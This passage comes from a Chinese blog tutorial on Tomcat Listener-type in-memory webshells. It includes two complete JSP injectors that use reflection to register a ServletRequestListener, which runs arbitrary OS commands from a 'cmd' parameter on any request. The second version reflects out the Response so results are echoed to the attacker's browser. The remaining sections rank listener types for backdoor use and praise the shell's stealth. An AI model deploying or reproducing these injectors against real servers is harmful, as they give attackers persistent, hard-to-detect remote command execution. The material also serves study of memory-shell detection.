通用：获取 StandardContext ==========</span></span><br><span class="line"><span class="comment">// Tomcat 里真正存储和管理所有 Listener（以及 Filter、Servlet）的对象就是 StandardContext</span></span><br><span class="line"><span class="type">ServletContext</span> <span class="variable">servletContext</span> <span class="operator">=</span> request.getSession().getServletContext();</span><br><span class="line"><span class="type">Field</span> <span class="variable">appContextField</span> <span class="operator">=</span> servletContext.getClass().getDeclaredField(<span class="string">&quot;context&quot;</span>);</span><br><span class="line">appContextField.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">ApplicationContext</span> <span class="variable">applicationContext</span> <span class="operator">=</span> (ApplicationContext) appContextField.get(servletContext);</span><br><span class="line"></span><br><span class="line"><span class="type">Field</span> <span class="variable">standardContextField</span> <span class="operator">=</span> applicationContext.getClass().getDeclaredField(<span class="string">&quot;context&quot;</span>);</span><br><span class="line">standardContextField.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">StandardContext</span> <span class="variable">standardContext</span> <span class="operator">=</span> (StandardContext) standardContextField.get(applicationContext);</span><br><span class="line"></span><br><span class="line"><span class="comment">// ========== 定义恶意 Listener ==========</span></span><br><span class="line"><span class="comment">// 匿名内部类，实现了 ServletRequestListener 接口</span></span><br><span class="line"><span class="comment">// Tomcat 中一共有多种 Listener 接口，分别监听不同的事件</span></span><br><span class="line"><span class="type">ServletRequestListener</span> <span class="variable">maliciousListener</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ServletRequestListener</span>() &#123;</span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="comment">// requestInitialized：每个 HTTP 请求刚到达 Tomcat、尚未交给 Filter/Servlet 处理时就会执行</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">requestInitialized</span><span class="params">(ServletRequestEvent sre)</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">// 从 ServletRequestEvent 中拿到 HttpServletRequest 对象</span></span><br><span class="line">            <span class="comment">// 注意：ServletRequestEvent 里没有 HttpServletResponse，所以无法直接回显</span></span><br><span class="line">            javax.servlet.http.<span class="type">HttpServletRequest</span> <span class="variable">req</span> <span class="operator">=</span></span><br><span class="line">                (javax.servlet.http.HttpServletRequest) sre.getServletRequest();</span><br><span class="line"></span><br><span class="line">            <span class="comment">// req.getParameter(&quot;cmd&quot;) 同时支持 GET 和 POST 请求</span></span><br><span class="line">            <span class="type">String</span> <span class="variable">cmd</span> <span class="operator">=</span> req.getParameter(<span class="string">&quot;cmd&quot;</span>);</span><br><span class="line">            <span class="keyword">if</span> (cmd != <span class="literal">null</span> &amp;&amp; !cmd.isEmpty()) &#123;</span><br><span class="line">                <span class="comment">// 执行系统命令</span></span><br><span class="line">                <span class="type">Process</span> <span class="variable">process</span> <span class="operator">=</span> Runtime.getRuntime().exec(cmd);</span><br><span class="line">                <span class="comment">// 读取结果然后输出</span></span><br><span class="line">                java.io.<span class="type">BufferedReader</span> <span class="variable">reader</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">java</span>.io.BufferedReader(</span><br><span class="line">                    <span class="keyword">new</span> <span class="title class_">java</span>.io.InputStreamReader(process.getInputStream())</span><br><span class="line">                );</span><br><span class="line">                String line;</span><br><span class="line">                <span class="type">StringBuilder</span> <span class="variable">output</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">StringBuilder</span>();</span><br><span class="line">                <span class="keyword">while</span> ((line = reader.readLine()) != <span class="literal">null</span>) &#123;</span><br><span class="line">                    output.append(line).append(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="comment">// 没有 response 对象，只能 print 到控制台</span></span><br><span class="line">                System.out.println(<span class="string">&quot;[Listener] CMD: &quot;</span> + cmd);</span><br><span class="line">                System.out.println(<span class="string">&quot;[Listener] Output: &quot;</span> + output.toString());</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="comment">// requestDestroyed：请求结束时执行，这里留空</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">requestDestroyed</span><span class="params">(ServletRequestEvent sre)</span> &#123;&#125;</span><br><span class="line">&#125;;</span><br><span class="line"><span class="comment">//有了 Listener 需要添加到 standardContext 的 applicationEventListenersList 里</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//  // ==================================================</span></span><br><span class="line"><span class="comment">//  // 方式一：通过反射操作 applicationEventListenersList 字段</span></span><br><span class="line"><span class="comment">//  // ==================================================</span></span><br><span class="line"><span class="comment">//  //在 standardContext 里找到 applicationEventListenersList 的字段反射调用</span></span><br><span class="line"><span class="comment">//  Field listenersField = standardContext.getClass().getDeclaredField(&quot;applicationEventListenersList&quot;);</span></span><br><span class="line"><span class="comment">//  listenersField.setAccessible(true);</span></span><br><span class="line"><span class="comment">//  List&lt;Object&gt; listeners = (List&lt;Object&gt;) listenersField.get(standardContext);</span></span><br><span class="line"><span class="comment">//  //利用 applicationEventListenersList 自带的 add 方法添加构造的 listener 对象</span></span><br><span class="line"><span class="comment">//  listeners.add(maliciousListener);</span></span><br><span class="line"><span class="comment">//  out.println(&quot;Listener injected via FIELD. Current count: &quot; + listeners.size());</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// ==================================================</span></span><br><span class="line">    <span class="comment">// 方式二：通过官方方法 addApplicationEventListener（推荐，更稳定）</span></span><br><span class="line">    <span class="comment">// ==================================================</span></span><br><span class="line">    <span class="comment">//standardContext 里有直接往 applicationEventListenersList 添加的方法 addApplicationEventListener 且是 public 方法</span></span><br><span class="line">    standardContext.addApplicationEventListener(maliciousListener);</span><br><span class="line">    <span class="comment">//如果 addApplicationEventListener 是私有方法,也可以用反射解决</span></span><br><span class="line">    <span class="comment">// 1. 获取 StandardContext 的 Class 对象（已经有了 standardContext 实例）</span></span><br><span class="line">    <span class="comment">//Class&lt;?&gt; clazz = standardContext.getClass();</span></span><br><span class="line">    <span class="comment">// 2. 获取私有方法：方法名 &quot;addApplicationEventListener&quot;，参数类型是 Object.class</span></span><br><span class="line">    <span class="comment">//java.lang.reflect.Method addMethod = clazz.getDeclaredMethod(&quot;addApplicationEventListener&quot;, Object.class);</span></span><br><span class="line">    <span class="comment">// 3. 打破私有访问限制</span></span><br><span class="line">    <span class="comment">//addMethod.setAccessible(true);</span></span><br><span class="line">    <span class="comment">// 4. 调用该方法，传入 standardContext 对象和恶意 listener 参数</span></span><br><span class="line">    <span class="comment">//addMethod.invoke(standardContext, maliciousListener);</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//获取 listenersArr 的长度然后显示到浏览器</span></span><br><span class="line">    Object[] listenersArr = standardContext.getApplicationEventListeners();</span><br><span class="line">    <span class="comment">//这个 out 是jsp的隐式对象 print可以直接写入 HTTP 响应体显示到浏览器,但是Listener内部是由tomcat回调执行处理,不能直接打印到浏览器</span></span><br><span class="line">    out.println(<span class="string">&quot;Listener injected via METHOD. Current count: &quot;</span> + listenersArr.length);</span><br><span class="line">    <span class="comment">// ==================================================</span></span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p>访问 <code>http://localhost:8080/inject_listener_noecho.jsp</code>，显示注册了一个监听器：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/Listener_image3.png"></p>
<p>再次访问，注册数量会累加（因为每次访问都会重新注入一个）：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/Listener_image4.png"></p>
<hr>
<h2 id="Listener-与-Filter-Servlet-的差异对比"><a href="#Listener-与-Filter-Servlet-的差异对比" class="headerlink" title="Listener 与 Filter&#x2F;Servlet 的差异对比"></a>Listener 与 Filter&#x2F;Servlet 的差异对比</h2><p>Listener 和 Filter、Servlet 在多次注入行为上有些不同：</p>
<table>
<thead>
<tr>
<th>类型</th>
<th>能否多次注入</th>
<th>关键约束</th>
<th>是否会覆盖</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Listener</strong></td>
<td>✅ 能</td>
<td>无名称，直接追加</td>
<td>不会覆盖，都会执行</td>
</tr>
<tr>
<td><strong>Filter</strong></td>
<td>✅ 能</td>
<td>Filter 名称必须唯一</td>
<td>相同名称会覆盖；不同名称共存</td>
</tr>
<tr>
<td><strong>Servlet</strong></td>
<td>✅ 能</td>
<td>Servlet 名称唯一；URL 映射唯一</td>
<td>相同名称或相同 URL 映射会覆盖</td>
</tr>
</tbody></table>
<p>Listener 没有名称这个概念，每次注入都是往列表里追加一个对象，所以注册了几个，每次请求就会触发几次。</p>
<p>此时再访问 <code>http://localhost:8080/任意路径?cmd=whoami</code>（只要该路径能被注册的监听器监听到就行，即使显示 404 也能被监听到）：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/Listener_image5.png"></p>
<p>IDEA 的 Tomcat 控制台里可以看到命令执行结果：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/Listener_image6.png"></p>
<blockquote>
<p>这里因为注册了四个监听器，访问了一次网站，被监听到了四次，所以输出了四条结果。</p>
</blockquote>
<p><strong>Listener 拦截”任意 URL”的优势：</strong></p>
<table>
<thead>
<tr>
<th>内存马类型</th>
<th>能否拦截任意 URL（包括不存在的路径、404）</th>
<th>条件</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Listener（ServletRequestListener）</strong></td>
<td>✅ 能</td>
<td>只要注册到 StandardContext，无需任何映射，<strong>每个请求都会触发</strong></td>
</tr>
<tr>
<td><strong>Filter</strong></td>
<td>✅ 能（但需要配置）</td>
<td>必须添加 <code>/*</code> 的 URL 映射，才能拦截所有请求</td>
</tr>
<tr>
<td><strong>Servlet</strong></td>
<td>❌ 一般不能</td>
<td>必须匹配具体的 URL 模式（如 <code>/shell</code>、<code>/admin/*</code>），无法覆盖所有路径</td>
</tr>
</tbody></table>
<hr>
<h2 id="回显问题：为什么-Listener-不能直接回显？"><a href="#回显问题：为什么-Listener-不能直接回显？" class="headerlink" title="回显问题：为什么 Listener 不能直接回显？"></a>回显问题：为什么 Listener 不能直接回显？</h2><p>上面的写法命令结果只输出在 IDEA 的 Tomcat 控制台里，没有回显到浏览器。那 Listener 可以像 Filter 和 Servlet 一样直接把命令结果回显到浏览器吗？</p>
<p><strong>不可以。</strong> 原因很简单：</p>
<ul>
<li><strong>Filter</strong>：<code>doFilter(ServletRequest request, ServletResponse response, FilterChain chain)</code> — 方法签名里直接有 <code>response</code></li>
<li><strong>Servlet</strong>：<code>service(HttpServletRequest request, HttpServletResponse response)</code> — 同上，直接有 <code>response</code></li>
<li><strong>Listener</strong>：<code>requestInitialized(ServletRequestEvent sre)</code> — 只有 <code>ServletRequestEvent</code>，<strong>没有 <code>ServletResponse</code></strong></li>
</ul>
<table>
<thead>
<tr>
<th>组件</th>
<th>方法签名</th>
<th>能否直接回显</th>
</tr>
</thead>
<tbody><tr>
<td>Filter</td>
<td><code>doFilter(request, response, chain)</code></td>
<td>✅ 直接写 response</td>
</tr>
<tr>
<td>Servlet</td>
<td><code>service(request, response)</code></td>
<td>✅ 直接写 response</td>
</tr>
<tr>
<td>Listener</td>
<td><code>requestInitialized(ServletRequestEvent sre)</code></td>
<td>❌ 没有 response，需要反射</td>
</tr>
</tbody></table>
<p>这也是为什么 <strong>Filter 型内存马</strong>和 <strong>Servlet 型内存马</strong>在回显上最方便，而 Listener 更适合做”无回显的潜伏监控”或者配合其他组件使用。</p>
<p><strong>解决思路大概有两种：</strong></p>
<ol>
<li><strong>Listener + Filter 组合</strong>：先用 Listener 监听，再由 Filter 负责回显。但这样还不如直接用 Filter，可能的优势是 Listener 触发时机比 Filter 略早一点点，实际意义不大。</li>
<li><strong>反射硬拿 Response</strong>（推荐，更干净）</li>
</ol>
<hr>
<h2 id="解决回显：反射硬拿-Response"><a href="#解决回显：反射硬拿-Response" class="headerlink" title="解决回显：反射硬拿 Response"></a>解决回显：反射硬拿 Response</h2><p><code>ServletRequestEvent</code> 只提供了 <code>getServletRequest()</code>，没有 <code>getServletResponse()</code>。但 Tomcat 在处理请求时，实际上<strong>同时</strong>创建了 Request 和 Response 对象，只是没暴露给 Listener 接口。</p>
<p>调用链大概长这样：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">javax.servlet.ServletRequestEvent 的 request 字段（实际类型是 RequestFacade）</span><br><span class="line">          ↓ 被存储在</span><br><span class="line">org.apache.catalina.connector.RequestFacade（暴露给 Servlet 的 HttpServletRequest 实现）</span><br><span class="line">          ↓ 被包装在</span><br><span class="line">org.apache.catalina.connector.Request（真正的请求对象，持有 Response 的引用）</span><br></pre></td></tr></table></figure>

<p>所以”找 response”的本质是：<strong>从 <code>ServletRequestEvent</code> 出发，穿透两层包装，拿到真正的 <code>Request</code>，再调用其 <code>getResponse()</code> 方法</strong>。</p>
<figure class="highlight jsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.lang.reflect.Field&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;javax.servlet.ServletRequestEvent&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;javax.servlet.ServletRequestListener&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;org.apache.catalina.core.StandardContext&quot;</span> %&gt;</span><br><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;org.apache.catalina.core.ApplicationContext&quot;</span> %&gt;</span><br><span class="line"></span><br><span class="line">&lt;%</span><br><span class="line"><span class="comment">// ========== 1. 获取 StandardContext ==========</span></span><br><span class="line"><span class="type">ServletContext</span> <span class="variable">servletContext</span> <span class="operator">=</span> request.getSession().getServletContext();</span><br><span class="line"><span class="type">Field</span> <span class="variable">appContextField</span> <span class="operator">=</span> servletContext.getClass().getDeclaredField(<span class="string">&quot;context&quot;</span>);</span><br><span class="line">appContextField.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">ApplicationContext</span> <span class="variable">applicationContext</span> <span class="operator">=</span> (ApplicationContext) appContextField.get(servletContext);</span><br><span class="line"></span><br><span class="line"><span class="type">Field</span> <span class="variable">standardContextField</span> <span class="operator">=</span> applicationContext.getClass().getDeclaredField(<span class="string">&quot;context&quot;</span>);</span><br><span class="line">standardContextField.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">StandardContext</span> <span class="variable">standardContext</span> <span class="operator">=</span> (StandardContext) standardContextField.get(applicationContext);</span><br><span class="line"></span><br><span class="line"><span class="comment">// ========== 2. 定义恶意 Listener（反射获取 Response 并回显） ==========</span></span><br><span class="line"><span class="type">ServletRequestListener</span> <span class="variable">maliciousListener</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ServletRequestListener</span>() &#123;</span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">requestInitialized</span><span class="params">(ServletRequestEvent sre)</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            javax.servlet.http.<span class="type">HttpServletRequest</span> <span class="variable">req</span> <span class="operator">=</span></span><br><span class="line">                (javax.servlet.http.HttpServletRequest) sre.getServletRequest();</span><br><span class="line">            <span class="type">String</span> <span class="variable">cmd</span> <span class="operator">=</span> req.getParameter(<span class="string">&quot;cmd&quot;</span>);</span><br><span class="line">            <span class="keyword">if</span> (cmd != <span class="literal">null</span> &amp;&amp; !cmd.isEmpty()) &#123;</span><br><span class="line">                <span class="comment">// 执行命令</span></span><br><span class="line">                <span class="type">Process</span> <span class="variable">process</span> <span class="operator">=</span> Runtime.getRuntime().exec(cmd);</span><br><span class="line">                java.io.<span class="type">BufferedReader</span> <span class="variable">reader</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">java</span>.io.BufferedReader(</span><br><span class="line">                    <span class="keyword">new</span> <span class="title class_">java</span>.io.InputStreamReader(process.getInputStream())</span><br><span class="line">                );</span><br><span class="line">                String line;</span><br><span class="line">                <span class="type">StringBuilder</span> <span class="variable">output</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">StringBuilder</span>();</span><br><span class="line">                <span class="keyword">while</span> ((line = reader.readLine()) != <span class="literal">null</span>) &#123;</span><br><span class="line">                    output.append(line).append(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="type">String</span> <span class="variable">result</span> <span class="operator">=</span> output.toString();</span><br><span class="line"></span><br><span class="line">                <span class="comment">// ========== 关键：反射获取 Response（两层反射） ==========</span></span><br><span class="line">                <span class="comment">// 步骤 1：从 ServletRequestEvent 中获取 request 字段（实际类型是 RequestFacade）</span></span><br><span class="line">                <span class="type">Field</span> <span class="variable">requestField</span> <span class="operator">=</span> sre.getClass().getDeclaredField(<span class="string">&quot;request&quot;</span>);</span><br><span class="line">                requestField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">                <span class="type">Object</span> <span class="variable">requestFacade</span> <span class="operator">=</span> requestField.get(sre); </span><br><span class="line">                <span class="comment">//此时获取的对象是 org.apache.catalina.connector.RequestFacade</span></span><br><span class="line"></span><br><span class="line">                <span class="comment">// 步骤 2：从 RequestFacade 中获取真正的 Request 对象（字段名也叫 &quot;request&quot;）</span></span><br><span class="line">                <span class="type">Field</span> <span class="variable">innerRequestField</span> <span class="operator">=</span> requestFacade.getClass().getDeclaredField(<span class="string">&quot;request&quot;</span>);</span><br><span class="line">                innerRequestField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">                org.apache.catalina.connector.<span class="type">Request</span> <span class="variable">catalinaRequest</span> <span class="operator">=</span></span><br><span class="line">                    (org.apache.catalina.connector.Request) innerRequestField.get(requestFacade);</span><br><span class="line"></span><br><span class="line">                <span class="comment">// 步骤 3：从 Request 中获取 Response</span></span><br><span class="line">                org.apache.catalina.connector.<span class="type">Response</span> <span class="variable">catalinaResponse</span> <span class="operator">=</span> catalinaRequest.getResponse();</span><br><span class="line"></span><br><span class="line">                <span class="comment">// 步骤 4：写入响应</span></span><br><span class="line">                catalinaResponse.setContentType(<span class="string">&quot;text/plain&quot;</span>);</span><br><span class="line">                catalinaResponse.getWriter().write(<span class="string">&quot;Command: &quot;</span> + cmd + <span class="string">&quot;\n&quot;</span>);</span><br><span class="line">                catalinaResponse.getWriter().write(<span class="string">&quot;Output:\n&quot;</span> + result);</span><br><span class="line">                catalinaResponse.flushBuffer();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">requestDestroyed</span><span class="params">(ServletRequestEvent sre)</span> &#123;&#125;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// ========== 3. 注入 Listener ==========</span></span><br><span class="line">standardContext.addApplicationEventListener(maliciousListener);</span><br><span class="line"></span><br><span class="line"><span class="comment">// ========== 4. 输出注入成功提示 ==========</span></span><br><span class="line">Object[] listenersArr = standardContext.getApplicationEventListeners();</span><br><span class="line">out.println(<span class="string">&quot;Listener (reflection echo) injected. Current count: &quot;</span> + listenersArr.length);</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p>访问 <code>http://localhost:8080/inject_listener_echo_reflect.jsp</code>，注入成功：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/Listener_image7.png"></p>
<p>然后访问 <code>http://localhost:8080/任何.jsp?cmd=whoami</code>，命令结果直接回显到浏览器：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/Listener_image8.png"></p>
<hr>
<h2 id="其他常见-Listener-接口简介"><a href="#其他常见-Listener-接口简介" class="headerlink" title="其他常见 Listener 接口简介"></a>其他常见 Listener 接口简介</h2><p>Tomcat 里不只有 <code>ServletRequestListener</code> 一种，还有其他几种，简单了解一下：</p>
<table>
<thead>
<tr>
<th>接口</th>
<th>触发时机</th>
<th>能否拿到 Request&#x2F;Response</th>
<th>内存马适用度</th>
</tr>
</thead>
<tbody><tr>
<td><code>ServletRequestListener</code></td>
<td>请求刚进入、请求结束时</td>
<td>有 ServletRequest，无 ServletResponse</td>
<td>⭐⭐⭐⭐⭐（最常用，触发频率高）</td>
</tr>
<tr>
<td><code>HttpSessionListener</code></td>
<td>Session 创建、销毁</td>
<td>无 Request&#x2F;Response</td>
<td>⭐⭐（需要先有 Session 才触发）</td>
</tr>
<tr>
<td><code>ServletContextListener</code></td>
<td>Web 应用启动、销毁时</td>
<td>无 Request&#x2F;Response</td>
<td>⭐（只触发一两次，不适合做后门）</td>
</tr>
<tr>
<td><code>ServletRequestAttributeListener</code></td>
<td>请求域属性增删改时</td>
<td>有 ServletRequest</td>
<td>⭐⭐（需要代码主动触发属性变化）</td>
</tr>
<tr>
<td><code>HttpSessionAttributeListener</code></td>
<td>Session 域属性变化时</td>
<td>无 Request&#x2F;Response</td>
<td>⭐（依赖 Session 操作）</td>
</tr>
<tr>
<td><code>AsyncListener</code></td>
<td>异步请求开始&#x2F;完成&#x2F;超时&#x2F;出错</td>
<td>有 ServletRequest&#x2F;ServletResponse</td>
<td>⭐⭐（需要异步支持）</td>
</tr>
</tbody></table>
<p>做内存马首选 <code>ServletRequestListener</code>，触发频率最高，几乎每个请求都能命中。</p>
<hr>
<h2 id="反射补充：六大核心能力"><a href="#反射补充：六大核心能力" class="headerlink" title="反射补充：六大核心能力"></a>反射补充：六大核心能力</h2><p>顺带把反射的六大核心能力梳理一下，目前代码审计碰到过前三种：</p>
<table>
<thead>
<tr>
<th>能力</th>
<th>关键类</th>
<th>核心方法</th>
<th>用途示例</th>
</tr>
</thead>
<tbody><tr>
<td><strong>1. 对象创建（构造器反射）</strong></td>
<td><code>Constructor</code></td>
<td><code>getDeclaredConstructor()</code> &#x2F; <code>newInstance()</code></td>
<td>创建类的实例，包括私有构造器</td>
</tr>
<tr>
<td><strong>2. 字段反射</strong></td>
<td><code>Field</code></td>
<td><code>getDeclaredField()</code> &#x2F; <code>set()</code> &#x2F; <code>get()</code></td>
<td>读取或修改成员变量的值（包括私有字段）</td>
</tr>
<tr>
<td><strong>3. 方法反射</strong></td>
<td><code>Method</code></td>
<td><code>getDeclaredMethod()</code> &#x2F; <code>invoke()</code></td>
<td>调用对象的方法（包括私有方法）</td>
</tr>
<tr>
<td><strong>4. 访问私有内部类</strong></td>
<td><code>Class</code></td>
<td><code>getDeclaredClasses()</code> &#x2F; <code>getDeclaredConstructors()</code></td>
<td>实例化或操作私有内部类、匿名类</td>
</tr>
<tr>
<td><strong>5. 数组反射</strong></td>
<td><code>Array</code></td>
<td><code>Array.newInstance()</code> &#x2F; <code>Array.get()</code> &#x2F; <code>set()</code></td>
<td>动态创建和操作数组</td>
</tr>
<tr>
<td><strong>6. 泛型反射</strong></td>
<td><code>ParameterizedType</code> 等</td>
<td><code>getGenericSuperclass()</code> &#x2F; <code>getGenericParameterTypes()</code></td>
<td>获取运行时泛型类型（比如 <code>List&lt;String&gt;</code> 中的 <code>String</code>）</td>
</tr>
</tbody></table>
<p>几种常用写法对比：</p>
<p><strong>构造器反射（创建对象）：</strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Constructor&lt;MyClass&gt; ctor = MyClass.class.getDeclaredConstructor(String.class);</span><br><span class="line">ctor.setAccessible(<span class="literal">true</span>); <span class="comment">// 如果构造器是 private</span></span><br><span class="line"><span class="type">MyClass</span> <span class="variable">obj</span> <span class="operator">=</span> ctor.newInstance(<span class="string">&quot;param&quot;</span>);</span><br></pre></td></tr></table></figure>

<p><strong>字段反射（读写私有字段）：</strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> obj.getClass().getDeclaredField(<span class="string">&quot;secret&quot;</span>);</span><br><span class="line">field.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">String</span> <span class="variable">value</span> <span class="operator">=</span> (String) field.get(obj);</span><br><span class="line">field.set(obj, <span class="string">&quot;new value&quot;</span>);</span><br></pre></td></tr></table></figure>

<p><strong>方法反射（调用私有方法）：</strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Method</span> <span class="variable">method</span> <span class="operator">=</span> obj.getClass().getDeclaredMethod(<span class="string">&quot;privateMethod&quot;</span>, String.class);</span><br><span class="line">method.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">result</span> <span class="operator">=</span> method.invoke(obj, <span class="string">&quot;arg&quot;</span>);</span><br></pre></td></tr></table></figure>

<p><strong>访问非公开类（以 AnnotationInvocationHandler 为例）：</strong></p>
<blockquote>
<p>注：这个不是内部类，当时记混了，但写法和构造器反射基本一样。</p>
</blockquote>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 1. 获取类（全限定名）</span></span><br><span class="line">Class&lt;?&gt; clazz = Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line"><span class="comment">// 2. 获取构造器：参数类型是 (Class&lt;? extends Annotation&gt;, Map&lt;String, Object&gt;)</span></span><br><span class="line">Constructor&lt;?&gt; ctor = clazz.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line"><span class="comment">// 3. 打破访问限制</span></span><br><span class="line">ctor.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="comment">// 4. 创建实例</span></span><br><span class="line"><span class="type">Object</span> <span class="variable">handler</span> <span class="operator">=</span> ctor.newInstance(Override.class, <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;());</span><br></pre></td></tr></table></figure>

<p>这几种写法结构高度相似，核心模式都是：<strong>获取 Class → 获取成员（字段&#x2F;方法&#x2F;构造器）→ setAccessible(true) → 操作</strong>。</p>
<hr>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>Listener 型内存马的整体思路比 Filter 和 Servlet 都简单，核心就一步：<strong>把恶意 Listener 对象塞进 <code>StandardContext</code> 的 <code>applicationEventListeners</code> 列表</strong>，Tomcat 的 <code>ApplicationEventDispatcher</code> 就会帮你在每次请求时自动调用它。</p>
<p>几个关键点：</p>
<ul>
<li><strong>注入方式</strong>：推荐用 <code>standardContext.addApplicationEventListener()</code>，比反射操作字段更稳定</li>
<li><strong>触发条件</strong>：无需 URL 映射，任意请求（包括 404）都能触发，隐蔽性强</li>
<li><strong>回显问题</strong>：Listener 接口没有 <code>response</code> 参数，要回显就得两层反射穿透拿到 <code>org.apache.catalina.connector.Response</code></li>
<li><strong>多次注入</strong>：Listener 没有名称约束，每次访问注入 JSP 都会追加一个新的，调试时注意别重复注册太多</li>
